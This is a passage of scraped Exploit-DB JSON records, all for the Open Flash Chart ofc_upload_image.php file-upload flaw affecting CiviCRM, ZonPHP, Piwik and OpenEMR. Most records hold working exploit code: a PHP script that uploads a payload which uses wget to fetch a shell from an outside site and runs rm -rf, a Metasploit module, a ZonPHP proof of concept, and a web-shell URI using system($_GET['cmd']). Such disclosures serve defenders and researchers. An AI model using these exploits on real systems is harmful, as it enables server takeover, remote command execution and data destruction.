/openemr/library/openflashchart/tmp-upload-images/joxypoxy.php HTTP/1.0\\r\\n\";\r\n$pckt .= \"Host: {$host}\\r\\n\";\r\n$pckt .= \"Connection: Keep-Alive\\r\\n\\r\\n\";\r\n\r\nfputs($sock, $pckt);\r\n\r\nsleep (2);\r\nprint \" .........\"; echo $go.\"[OK]\"; echo $no.\"\\n\";\r\n\r\n// interact_sh();\r\necho \"\\n> Enjoy!\\n\\n\";\r\n\r\n?>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24492/"}, {"lastseen": "2016-02-03T00:22:05", "osvdbidlist": ["59051"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "CiviCRM for Joomla 4.2.2 - Remote Code Injection. CVE-2009-4140,CVE-2011-4275. Webapps exploit for php platform", "reporter": "iskorpitx", "published": "2013-04-22T00:00:00", "type": "exploitdb", "title": "CiviCRM for Joomla 4.2.2 - Remote Code Injection", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4140", "CVE-2011-4275"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2013-04-22T00:00:00", "id": "EDB-ID:24969", "href": "https://www.exploit-db.com/exploits/24969/", "sourceData": "# Exploit Title: joomla component com_civicrm remode code injection exploit\r\n# Google Dork:\"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart\"\r\n# Date: 20/04/2013\r\n# Exploit Author: iskorpitx\r\n# Vendor Homepage: http://civicrm.org\r\n# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422\r\n# Version: [civicrm 4.2.2]\r\n# Tested on: Win8 Pro x64 \r\n# CVE : http://www.securityweb.org\r\n\r\n<?php \r\n \r\n# Joomla component com_civicrm OpenFlashCart ofc_upload_image.php remote code injection exploit\r\n# http://www.securityweb.org & http://www.security.biz.tr\r\n# multithreading mass c:\\appserv\\www>exp.php -u http://target.com/ -f post.php\r\n \r\n \r\n \r\n$options = getopt('u:f:'); \r\n \r\nif(!isset($options['u'], $options['f'])) \r\ndie(\"\\n Usage example: php jnews.php -u http://target.com/ -f post.php\\n \r\n-u http://target.com/ The full path to Joomla! \r\n-f post.php The name of the file to create.\\n\"); \r\n \r\n$url = $options['u']; \r\n$file = $options['f']; \r\n\r\n\r\n$shell = \"{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}\"; \r\n$url = \"{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name={$file}\"; \r\n\r\n \r\n$data = '<?php \r\n system(\"wget http://www.securityweb.org/shell.txt; mv shell.txt post.php\");\r\n system(\"cp post.php ../../../../../../../tmp/post.php\");\r\n system(\"cd ..; rm -rf tmp-upload-images\");\r\n echo \"by iskorpitx\" ; \r\n fclose ( $handle ); \r\n ?>'; \r\n$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', \r\n'Content-Type: text/plain'); \r\n \r\n \r\necho \" [+] Submitting request to: {$options['u']}\\n\"; \r\n \r\n \r\n$handle = curl_init(); \r\n \r\ncurl_setopt($handle, CURLOPT_URL, $url); \r\ncurl_setopt($handle, CURLOPT_HTTPHEADER, $headers); \r\ncurl_setopt($handle, CURLOPT_POSTFIELDS, $data); \r\ncurl_setopt($handle, CURLOPT_RETURNTRANSFER, true); \r\n \r\n$source = curl_exec($handle); \r\ncurl_close($handle); \r\n \r\n \r\nif(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) \r\n{ \r\necho \" [+] Exploit completed successfully!\\n\"; \r\necho \" ______________________________________________\\n\\n {$shell}?cmd=system('id');\\n\"; \r\n} \r\nelse\r\n{ \r\ndie(\" [+] Exploit was unsuccessful.\\n\"); \r\n} \r\n \r\n?> \r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24969/"}, {"lastseen": "2016-02-03T09:49:37", "osvdbidlist": ["59051"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Open Flash Chart 2 - Arbitrary File Upload. CVE-2009-4140,CVE-2011-4275. Remote exploit for php platform", "reporter": "metasploit", "published": "2013-10-26T00:00:00", "type": "exploitdb", "title": "Open Flash Chart 2 - Arbitrary File Upload", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4140", "CVE-2011-4275"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2013-10-26T00:00:00", "id": "EDB-ID:29210", "href": "https://www.exploit-db.com/exploits/29210/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Open Flash Chart v2 Arbitrary File Upload\",\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability found in Open Flash\r\n Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file\r\n in order to upload and execute malicious PHP files.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Braeden Thomas', # Initial discovery + Piwik PoC\r\n 'Gjoko Krstic <gjoko[at]zeroscience.mk>', # OpenEMR PoC\r\n 'Halim Cruzito', # zonPHP PoC\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['BID', '37314'],\r\n ['CVE', '2009-4140'],\r\n ['OSVDB', '59051'],\r\n ['EDB', '10532']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 8190, # Just a big value, injection on HTTP POST\r\n 'DisableNops' => true,\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Arch' => ARCH_PHP,\r\n 'Platform' => 'php',\r\n 'Targets' =>\r\n [\r\n # Tested on:\r\n # * open-flash-chart v2-Lug-Wyrm-Charmer\r\n # set TARGETURI /php-ofc-library/\r\n # * open-flash-chart v2-beta-1\r\n # set TARGETURI /php-ofc-library/\r\n # * zonPHP v2.25\r\n # set TARGETURI /zonPHPv225/ofc/\r\n # * Piwik v0.4.3\r\n # set TARGETURI /piwik/libs/open-flash-chart/php-ofc-library/\r\n # * OpenEMR v4.1.1\r\n # set TARGETURI /openemr-4.1.1/library/openflashchart/php-ofc-library/\r\n [ 'Generic (PHP Payload)', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 14 2009',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to Open Flash Chart', '/php-ofc-library/'])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # Check for ofc_upload_image.php\r\n #\r\n def check\r\n print_status(\"#{peer} - Sending check\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"ofc_upload_image.php\"),\r\n })\r\n if not res\r\n print_error(\"#{peer} - Connection timed out\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code.to_i == 404\r\n print_error(\"#{peer} - No ofc_upload_image.php found\")\r\n elsif res and res.code == 200 and res.body =~ /Saving your image to/\r\n vprint_status(\"#{peer} - Found ofc_upload_image.php\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n\r\n # Upload\r\n @fname = \"#{rand_text_alphanumeric(rand(10)+6)}.php\"\r\n print_status(\"#{peer} - Uploading '#{@fname}' (#{payload.encoded.length} bytes)...\")\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'ofc_upload_image.php'),\r\n 'ctype' => \"\",\r\n 'vars_get' => { 'name' => \"#{@fname}\" },\r\n 'data' => \"<?php #{payload.encoded} ?>\"\r\n })\r\n if not res\r\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\r\n elsif res.code.to_i == 404\r\n fail_with(Failure::NotFound, \"#{peer} - No ofc_upload_image.php found\")\r\n elsif res.body =~ /can't write file/\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to write '#{@fname}'\")\r\n elsif res.body =~ /Saving your image to: (.+)#{@fname}/\r\n path = $1\r\n register_files_for_cleanup(@fname)\r\n print_status(\"#{peer} - Executing '#{path}#{@fname}'\")\r\n else\r\n fail_with(Failure::NotVulnerable, \"#{peer} - File wasn't uploaded, aborting!\")\r\n end\r\n\r\n # Execute\r\n res = send_request_raw({\r\n 'uri' => normalize_uri(target_uri.path, path, @fname)\r\n })\r\n if res and res.code == 404\r\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{@fname}\")\r\n end\r\n\r\n end\r\nend\r\n\r\n#\r\n# Source\r\n#\r\n=begin ofc_upload_image.php\r\n20-// default path for the image to be stored //\r\n21-$default_path = '../tmp-upload-images/';\r\n\r\n23-if (!file_exists($default_path)) mkdir($default_path, 0777, true);\r\n\r\n25-// full path to the saved image including filename //\r\n26-$destination = $default_path . basename( $_GET[ 'name' ] );\r\n\r\n28-echo 'Saving your image to: '. $destination;\r\n\r\n39-$jfh = fopen($destination, 'w') or die(\"can't open file\");\r\n40-fwrite($jfh, $HTTP_RAW_POST_DATA);\r\n41-fclose($jfh);\r\n=end", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29210/"}, {"lastseen": "2016-02-03T09:35:30", "osvdbidlist": ["59051"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "ZonPHP 2.25 - Remote Code Execution (RCE) Vulnerability. CVE-2009-4140,CVE-2011-4275. Webapps exploit for php platform", "reporter": "Halim Cruzito", "published": "2013-10-20T00:00:00", "type": "exploitdb", "title": "ZonPHP 2.25 - Remote Code Execution RCE Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4140", "CVE-2011-4275"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2013-10-20T00:00:00", "id": "EDB-ID:29091", "href": "https://www.exploit-db.com/exploits/29091/", "sourceData": "# Exploit Title: ZonPHP V2.25 RCE Vulnerability\r\n# Google Dork: intext:\"Made by SLAPER\"\r\n# Date: 21-10-2013\r\n# Exploit Author: Halim Cruzito\r\n# Vendor Homepage: http://www.slaper.be\r\n# Software Link: http://www.slaper.be/zonPHPv225.zip\r\n# Version: v2.25\r\n# Tested on: Windows 7\r\n\r\n# PoC:\r\n\r\n<?php\r\n\r\n$url = \"http://server/\";\r\n$path = \"ofc/ofc_upload_image.php?name=\";\r\n$filename = \"up.php\";\r\n$data = \"<?php phpinfo(); ?>\";\r\n$headers = array(\"User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\ufffd\r\n\"Content-Type: text/plain\");\r\n\r\n\r\n$rc = curl_init();\r\ncurl_setopt($rc, CURLOPT_URL, $url.$path.$filename);\r\ncurl_setopt($rc, CURLOPT_HTTPHEADER, $headers);\r\ncurl_setopt($rc, CURLOPT_POST, 1);\r\ncurl_setopt( $rc, CURLOPT_SSL_VERIFYPEER, 1);\r\ncurl_setopt($rc, CURLOPT_POSTFIELDS, $data);\r\ncurl_setopt($rc, CURLOPT_RETURNTRANSFER, 1);\r\n$ex = curl_exec($rc);\r\ncurl_close($rc);\ufffd\r\n\r\n$shelllink = ''.$url.''.$filename.'';\r\necho '<a href=\"'.$shelllink.'\" target=\"blank\">Exploited Click Here!</a>';\r\n\r\n?>\r\n\r\n\r\n\ufffd===============================================\r\n|Loveto:Karoxx Puyoo ^^ and all Malaysian HaXor |\r\n\ufffd===============================================", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29091/"}, {"lastseen": "2016-02-01T12:41:17", "osvdbidlist": ["59051"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Piwik Open Flash Chart Remote Code Execution Vulnerability. CVE-2009-4140,CVE-2011-4275. Webapps exploit for php platform", "reporter": "Braeden Thomas", "published": "2009-12-17T00:00:00", "type": "exploitdb", "title": "Piwik Open Flash Chart Remote Code Execution Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4140", "CVE-2011-4275"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2009-12-17T00:00:00", "id": "EDB-ID:10532", "href": "https://www.exploit-db.com/exploits/10532/", "sourceData": "Bugtraq ID: \t 37314\r\nClass: \tInput Validation Error\r\nCVE: \t\r\nRemote: \tYes\r\nLocal: \tNo\r\nPublished: \tDec 14 2009 12:00AM\r\nUpdated: \tDec 17 2009 06:03PM\r\nCredit: \tBraeden Thomas\r\nVulnerable: \tPiwik Piwik 0.4.3\r\nPiwik Piwik 0.4.2\r\nPiwik Piwik 0.4.1\r\nPiwik Piwik 0.4\r\nPiwik Piwik 0.2.37\r\nPiwik Piwik 0.2.36\r\nPiwik Piwik 0.2.35\r\nOpen Web Analytics Open Web Analytics 1.2.0\r\nOpen Flash Chart Open Flash Chart 2.0\r\n\r\n\r\nOpen Flash Chart is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.\r\n\r\nAttackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.\r\n\r\nOpen Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other versions may also be affected. \r\n\r\nThe following example URI is available:\r\n\r\nhttp://server/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?> ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10532/"}]}
